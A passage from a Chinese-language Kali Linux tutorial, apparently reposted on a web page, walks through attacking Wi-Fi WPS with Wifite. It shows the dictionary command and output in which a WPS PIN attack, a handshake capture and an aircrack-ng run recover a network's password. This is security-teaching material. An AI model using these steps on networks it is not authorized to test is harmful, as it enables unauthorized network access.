从以上输出信息中 , 可以看到正在等待连接到14:E6:E4:AC:FB:20无线路由器的信号 。并且通过发送PIN信息 , 获取密码 。
如果没有路由器没有开启WPS的话 , 将会出现如下所示的信息:
[!] WARNING: Failed to associate with 14:E6:E4:AC:FB:20 (ESSID: XXXX)
Fern WiFi Cracker是一个非常不错的工具 , 用来测试无线网络安全 。后面将会介绍使用该工具 , 攻击Wi-Fi网络 。这里首先介绍使用Fern WiFi Cracker工具来攻击WPS 。
【实例9-2】使用Wifite攻击WPS 。具体操作步骤如下所示 。
(1)启动Wifite工具 , 并指定使用common.txt密码字典 。在命令行终端执行如下所示的命令:
root@kali:~# wifite -dict common.txt
执行以上命令后 , 将显示如下所示的信息:

文章插图

文章插图
以上信息显示了WiFite工具的版本信息 , 支持平台 , 并且开始扫描无线网络 。当扫描到想要破解的无线网络时 , 按下CTRL+C组合键停止扫描 。
(2)停止扫描无线网络 , 将显示如下所示的信息:

文章插图

文章插图
从以上输出信息中 , 可以看到扫描到五个无线接入点和三个客户端 。在输出信息中 , 共显示了7列 。分别表示无线接入点编号、ESSID号、信道、加密方式、电功率、是否开启wps和客户端 。如果仅有一个客户端连接到无线接入点 , 则CLIENT列显示是client 。如果有多个客户端连接的话 , 则显示是clients 。
(3)此时 , 选择要攻击的无线接入点 。这里选择第五个无线接入点 , 输入“1” 。然后按下回车键将开始攻击 , 显示信息如下所示:
[+] select target numbers (1-5) separated by commas, or \'all\': 1[+] 1 target selected.[0:00:00] initializing WPS PIN attack on yzty (EC:17:2F:46:70:BA) [0:11:00] WPS attack, 0/0 success/ttl, [!] unable to complete successful try in 660 seconds [+] skipping yzty [0:08:20] starting wpa handshake capture on \"yzty\" [0:08:11] new client found: 18:DC:56:F0:62:AF [0:08:09] listening for handshake… [0:00:11] handshake captured! saved as \"hs/yzty_EC-17-2F-46-70-BA.cap\" [+] 2 attacks completed: [+] 1/2 WPA attacks succeededyzty (EC:17:2F:46:70:BA) handshake capturedsaved as hs/yzty_EC-17-2F-46-70-BA.cap [+] starting WPA cracker on 1 handshake [0:00:00] cracking yzty with aircrack-ng [+] cracked yzty (EC:17:2F:46:70:BA)! [+] key:\"huolong5\"[+] quitting
从输出的信息中 , 可以看到破解出yzty无线设备的密码为huolong5 。推荐阅读
- 如何给应用设置密码 将聊天软件加密的方法
- 无线网络禁止外人连接的技巧 自己家的wifi怎么查有人蹭网
- 电脑设置路由器密码的基础教程 电脑如何设或更改WIFI密码
- 如何将文件夹加密码 win7文件夹如何设置密码保护
- 无线信号wifi放大器有用吗 锐捷小兔子MESH放大器测评
- 电脑桌面网络图标没了的恢复方法 电脑右下角wifi图标不见了怎么恢复
- mac查看wifi密码的简单方法 macos怎么查看wifi密码
- 苹果11能连接wifi6吗 苹果11支持wifi6吗
- wifi已连接不可上网原因 路由器无线网连接上却上不了网怎么回事
- 电脑怎么连接wifi 台式电脑连接wifi步骤图解